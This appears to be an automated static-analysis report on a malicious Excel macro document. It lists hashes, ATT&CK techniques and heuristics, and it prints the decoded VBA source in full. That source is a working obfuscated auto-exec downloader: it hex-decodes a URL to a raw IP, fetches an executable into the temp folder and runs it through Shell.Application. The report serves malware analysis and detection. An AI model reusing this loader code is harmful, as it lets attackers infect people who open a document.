Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f6d780eee13390c…

MALICIOUS

Office (OLE)

Size: 24.5 KB
Created: 1996-10-08 23:32:33
Authoring application: Microsoft Excel
First seen: 2015-01-04
MD5: 12a329ec30a90b57ad5d65261a03038c
SHA-1: e58c4856ffc75c2f9cbf757c4d9058342e4cedad
SHA-256: 3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d
Risk Score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The file contains both Excel 4.0 (XLM) and VBA macros, with critical heuristics indicating an obfuscated auto-exec loader. The VBA script attempts to download a file using MSXML2.XMLHTTP and then executes it using CreateObject("Shell.Application"), likely saving it to a temporary directory. The XLM macros are less clear but indicate macro sheet usage. The combination of obfuscated auto-execution and payload download points to a downloader or initial access stage.

Heuristics (9)

  • Excel 4.0 (XLM) Auto_Open + macro sheet [critical] OLE_XLM_AUTOOPEN
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected [medium, 7 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call.
    Matched line in script:
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro.
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro.
    Matched line in script:
        Sub Workbook_Open()
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro.
    Matched line in script:
        Sub Auto_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access).
    Matched line in script:
        GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 602 bytes
SHA-256: 3fa62bd3570fd5ef8fae805a928b3ccc3c6451937644bacbdd5508fc2ec659f6
Preview script
First 1,000 lines of the extracted script
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     22 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    0 : 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3057 bytes
SHA-256: 05e929e61895168e58c8c5ef6a9083d3ce0b9e1890772d37dca9dbd05e0a244f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Function rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta(ByVal gtretret As String) As String
  Dim i       As Long
  For i = 1 To Len(gtretret) Step 2

Dim MexzDXUy As Integer
MexzDXUy = 3
Do While MexzDXUy < 81
DoEvents: MexzDXUy = MexzDXUy + 1
Loop

  rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta & Chr$(Val("&H" & Mid$(gtretret, i, 2)))
  Next i
 End Function

Sub Auto_Open()
NGHDLXMAJBA
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Function IQQKFERUGKJ(ByVal RGZAGVPYQAW As String, ByVal HNGYJSJELUV As String) As Boolean
     Dim EYQNARIIOVP As Object, GUTUPYZSTWJ As Long, LJDEHVYKBYP As Long, VCAJTUXQHLA() As Byte

    Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
    EYQNARIIOVP.Open "GET", RGZAGVPYQAW, False
    EYQNARIIOVP.Send "sdfggdgdfg"


    VCAJTUXQHLA = EYQNARIIOVP.responseBody

    LJDEHVYKBYP = FreeFile

    Open HNGYJSJELUV For Binary As #LJDEHVYKBYP
    Put #LJDEHVYKBYP, , VCAJTUXQHLA
    Close #LJDEHVYKBYP
    
Set GBIviviu67FUGBK = CreateObject(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("5368656C6C2E4170706C69636174696F6E"))
GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Function
Sub NGHDLXMAJBA()
fdgBBBB = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("687474703A2F2F33382E39362E3137352E3133393A383038302F737461742F6C6C64762E706870")
    IQQKFERUGKJ fdgBBBB, Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True